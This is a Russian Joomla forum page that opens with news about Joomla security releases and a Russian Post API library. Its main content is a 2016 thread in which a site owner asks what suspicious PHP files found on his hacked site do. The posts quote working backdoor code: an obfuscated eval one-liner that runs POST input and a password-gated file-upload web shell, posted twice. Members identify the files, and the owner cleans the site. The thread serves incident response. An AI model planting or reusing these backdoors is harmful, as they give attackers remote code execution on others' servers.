Новости Joomla

Вышли релизы безопасности Joomla 6.1.3 и Joomla 5.4.8

Релиз безопасности Joomla 6.1.3 и Joomla 5.4.8

Проект Joomla! рад сообщить о выходе Joomla 6.1.3 и Joomla 5.4.8. Это релизы безопасности и исправления ошибок для серий 5.x и 6.x.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

👩‍💻 WT Otpravkapochtaru - библиотека сервиса Отправка Почты России для Joomla-разработчиков.

Joomla 5+ пакет для интеграции с API Почты России: нормализация данных, расчёт доставки, создание отправлений, партии, документы, возвраты, поиск отделений, справочники и SOAP-отслеживание.

v.3.0.0. Что нового?
Это дальнейшее развитие ранее закрытой Joomla-библиотеки для работы с API сервиса Отправка (для бизнеса) Почты России. Поэтому версия не 1.0.0, а 3.0.0.

Сейчас эта библиотека ушла от собственных реализаций и стала Joomla-обёрткой известного PHP SDK от Lapay Group.

Возможности библиотеки.
- получение настроек аккаунта, точек сдачи и текущего остатка запросов к API;
- нормализация адресов, ФИО и телефонов перед созданием отправления;
- расчёт тарифа и срока доставки;
- создание, поиск, изменение, удаление и возврат заказов в состояние «Новые»;
- проверка надёжности получателя;
- создание партий, просмотр партий и заказов внутри партии;
- генерация пакета печатных документов и формы Ф103;
- создание, изменение и удаление возвратных отправлений;
- поиск отделений по индексу, адресу и координатам, получение сервисов отделения;
- локальный список стран;
- SOAP-отслеживание операций по РПО и работа с билетами пакетного трекинга.

👩‍💻 Joomla-возможности.
В пакете библиотеки WT Otpravkapochtaru есть поля Joomla Form для расширений. Они позволяют работать в интерфейсе Joomla с некоторыми типами данных, получаемых по API из вашего личного кабинета в ЛК Почты России для бизнеса.
На данный момент в библиотеке доступны 3 поля списков, которые отображают доступные в аккаунте ОПС, типы и категории отправлений.
Поддерживаются зависимые списки: значение одного поля обновляется при изменении другого.

Системные требования.
Системные требования в основном связаны с системными требованиями апстрима библиотеки - LapayGroup PHP SDK.
- Joomla 5+
- PHP 8.3+
- Расширения PHP:
-- ext-mbstring
-- ext-simplexml
-- ext-soap (опционально, для трекинга)
-- ext-zip

Ссылки:
- Страница расширения
- GitHub библиотеки и документация

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 2384 Просмотров
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Здравствуйте. Недавно обнаружил на своем сайте один подозрительный php файл, прогнал через ai-bolit, нашел множество файлов с одинаковым кодом (с разными именами), в разных директориях сайта. Что он делает?

1. файл:
Код
<?php isset($_POST['airq8i']) && ($www= $_POST['airq8i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

2. файл:
Код
<?php isset($_POST['340q10']) && ($www= $_POST['340q10']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

И все файлы в таком роде.

Я так понял если ему передать пост данные, то что он сделает?
« Последнее редактирование: 16.07.2016, 14:46:47 от Леон »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Взломали сайт, что делает код?
« Ответ #1 : 16.07.2016, 14:52:14 »
Я так понял если ему передать пост данные, то что он сделает?
Выполнит то что ему указано  ^-^
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #2 : 16.07.2016, 14:59:46 »
Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #3 : 16.07.2016, 15:13:10 »
Наверное будет еще один файл с основным кодом, а эти порядка 50-ти одинаковых для его запуска?
Разные только параметры POST, все остальное одинаково
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #4 : 16.07.2016, 15:15:25 »
Нашел еще один файл на сайте, тут уже похоже форма загрузки файлов:
Код
<?php if(md5($_GET["ms-load"])=="cb8f68e224e682ef7f1b3747f3f749d4"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт, что делает код?
« Ответ #5 : 16.07.2016, 15:21:55 »
Она самая.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #6 : 16.07.2016, 15:32:11 »
Молодец, в верном направлении мыслишь!
*

Леон

  • Захожу иногда
  • 333
  • 5 / 0
Re: Взломали сайт, что делает код?
« Ответ #7 : 19.07.2016, 14:02:05 »
Удалил все подозрительные файлы. Сменил пароли, обновил движок, поставил компонент Securitycheck Pro J3x. Прошло 2 дня, пока все чисто, прогонял еще раз ai-bolit'ом, ничего нового не появилось) Жаль не удалось узнать что именно эти вирусы делали.
*

Masha0701

  • Осваиваюсь на форуме
  • 28
  • 0 / 0
Re: Взломали сайт, что делает код?
« Ответ #8 : 01.12.2016, 10:31:03 »
Я так понимаю, это тоже инъекция ?

_______________
<?php if(md5($_GET["ms-load"])=="8e5c6d4f76b8a4c0593846e4aeffc38c"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
$tend
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfilen";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}
_________________________
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломали сайт, что делает код?
« Ответ #9 : 01.12.2016, 10:45:35 »
Похоже - да. А в файле есть проверка на вход через Joomla ?
Код
// no direct access
defined('_JEXEC') or die('Restricted access');
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломали сайт, что делает код?
« Ответ #10 : 01.12.2016, 11:55:21 »
Я так понимаю, это тоже инъекция ?
НЕТ! это называется уплодер))))
*

wishlight

  • Гуру
  • 5098
  • 322 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломали сайт, что делает код?
« Ответ #11 : 01.12.2016, 11:58:25 »
Я так понимаю, это тоже инъекция ?

Последствия ее. Лечить и обновлять.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус js.redirector.304

Автор tegos134

Ответов: 1
Просмотров: 1730
Последний ответ 24.08.2016, 22:18:17
от beliyadm
В Head появляется скрипт

Автор Zegeberg

Ответов: 3
Просмотров: 1755
Последний ответ 23.06.2016, 16:07:19
от Zegeberg
Проблемы с правами после смены хостинга

Автор Леон

Ответов: 2
Просмотров: 1695
Последний ответ 10.05.2016, 11:39:36
от Леон
Появляются новые пользователи "Super User" с логи

Автор crcp_kz

Ответов: 9
Просмотров: 3270
Последний ответ 25.04.2016, 11:54:06
от FitMe
Re: Два проникновения на сайт с обновленной Joomla

Автор Agard

Ответов: 9
Просмотров: 1598
Последний ответ 08.03.2016, 10:58:38
от winstrool